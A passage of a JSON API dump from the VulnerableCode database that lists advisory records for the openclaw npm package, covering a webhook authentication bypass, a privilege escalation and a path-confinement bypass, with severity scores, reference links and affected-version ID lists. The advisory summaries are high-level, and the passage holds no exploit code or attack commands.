],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-84fd-3yvx-rfgq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90936?format=json","vulnerability_id":"VCID-84v2-s1yq-rkfr","summary":"Duplicate Advisory: OpenClaw: BlueBubbles beta plugin webhook auth hardening (remove passwordless fallback)\n## Duplicate Advisory\n\nThis 
advisory has been withdrawn because it is a duplicate of GHSA-5mx2-2mgw-x8rm. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.21 BlueBubbles webhook handler contains a passwordless fallback authentication path that allows unauthenticated webhook events in certain reverse-proxy or local routing configurations. Attackers can bypass webhook authentication by exploiting the loopback/proxy heuristics to send unauthenticated webhook events to the BlueBubbles plugin.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/283029bdea23164ab7482b320cb420d1b90df806","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/283029bdea23164ab7482b320cb420d1b90df806"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6b2f2811dc623e5faaf2f76afaa9279637174590","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6b2f2811dc623e5faaf2f76afaa9279637174590"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-webhook-access-via-pass
wordless-fallback-in-bluebubbles-plugin","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-webhook-access-via-passwordless-fallback-in-bluebubbles-plugin"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32896","reference_id":"CVE-2026-32896","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32896"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5mx2-2mgw-x8rm","reference_id":"GHSA-5mx2-2mgw-x8rm","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5mx2-2mgw-x8rm"},{"reference_url":"https://github.com/advisories/GHSA-vh4c-j2x
v-9pv9","reference_id":"GHSA-vh4c-j2xv-9pv9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vh4c-j2xv-9pv9"}],"fixed_packages":[],"aliases":["GHSA-vh4c-j2xv-9pv9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-84v2-s1yq-rkfr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89605?format=json","vulnerability_id":"VCID-8aek-6dw1-tudj","summary":"Duplicate Advisory: OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hf68-49fm-59cq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. 
Attackers can exploit insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},
{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"},{"reference_url":"https://github.com/advisories/GHSA-r3v5-2grc-429h","reference_id":"GHSA-r3v5-2grc-429h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r3v5-2grc-429h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"
vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"
vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"
vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"
vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"
vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-r3v5-2grc-429h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8aek-6dw1-tudj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50589?format=json","vulnerability_id":"VCID-8u6d-ekbs-afgd","summary":"OpenClaw: Unified root-bound write hardening for browser output and related path-boundary flows\nA path-confinement bypass in browser output handling allowed writes outside intended roots in `openclaw` versions up to and including `2026.3.1`.\n\nThe fix unifies root-bound, file-descriptor-verified write semantics and canonical path-boundary validation across browser output and related install/skills write 
paths.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22180","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06222","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06226","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06237","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22180"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/104d32bb64cdf19d5e77f70553a511a2ae90ad1c","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:04:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/104d32bb64cdf19d5e77f70553a511a2ae90ad1c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22180","reference_id":"CVE-2026-22180","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22180"},{"reference_url":"https://github.com/advisories/GHSA-3pxq-f3cp-jmxp","reference_id":"GHSA-3pxq-f3cp-jmxp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHS
A-3pxq-f3cp-jmxp"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pxq-f3cp-jmxp","reference_id":"GHSA-3pxq-f3cp-jmxp","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:04:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pxq-f3cp-jmxp"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-confinement-bypass-in-browser-output-and-file-write-operations","reference_id":"openclaw-path-confinement-bypass-in-browser-output-and-file-write-operations","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:04:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-path-confinement-bypass-in-browser-output-and-file-write-operations"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1s
mq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-p